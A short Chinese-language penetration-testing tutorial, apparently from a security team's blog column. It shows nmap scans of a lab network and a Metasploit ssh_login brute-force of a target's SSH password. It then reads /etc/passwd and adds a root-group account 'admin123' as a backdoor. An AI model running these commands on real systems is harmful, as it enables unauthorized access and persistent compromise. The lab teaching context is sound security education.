標籤:

內網滲透之掃描與SSH暴力破解

內網滲透之掃描與SSH暴力破解

來自專欄 ChaMd5安全團隊

掃描區域網存活主機

注意:以下使用的ip地址為我部署的環境網段,如果你在看本文,請靈活的進行學習以及使用。目標主機=靶機

nmap -sP 192.168.1.0/24

掃描靶機的操作系統以及版本號

nmap -O 192.168.1.111

掃描靶機的應用程序以及應用程序的版本號

nmap -sV 192.168.1.111

利用msf ssh_login模塊暴力破解靶機ssh密碼

先打開MSF 進入ssh_login模塊 show options查看提示

使用ssh_login模塊

use auxiliary/scanner/ssh/ssh_login

設定靶機IP

set RHOSTS 192.168.1.111

設置賬號文件/設置賬號

你可以設置賬號,但是只嘗試這一個,建議你使用賬號文件

#設置賬號set USERNAME root

#設置賬號文件set USER_FILE 密碼文件

設置密碼文件/設置密碼

你可以設置密碼,但是只嘗試這一個,建議你使用密碼文件

#設置密碼set PASSWORD 123456

#設置密碼文件set PASS_FILE 密碼文件

運行

你既可以使用run也可以使用exploit

會話

查詢會話方面的信息

sessions -i

打開會話

#打開id為1的會話 輸入ifconfig查詢ip 成功sessions -i 1

查看密碼文件

cat /etc/passwd

添加用戶設置密碼並添加到root組

useradd admin123passwd admin123usermod -g root admin123

推薦閱讀:

發財樹說016-安全領域,360的顛覆者的來了
入侵特斯拉——智能汽車安全性分析
北上廣深的請注意,阿里聚安全來找你玩啦
信息安全的商業模式
如何找回WhatsApp被刪除的消息

TAG:網路安全 |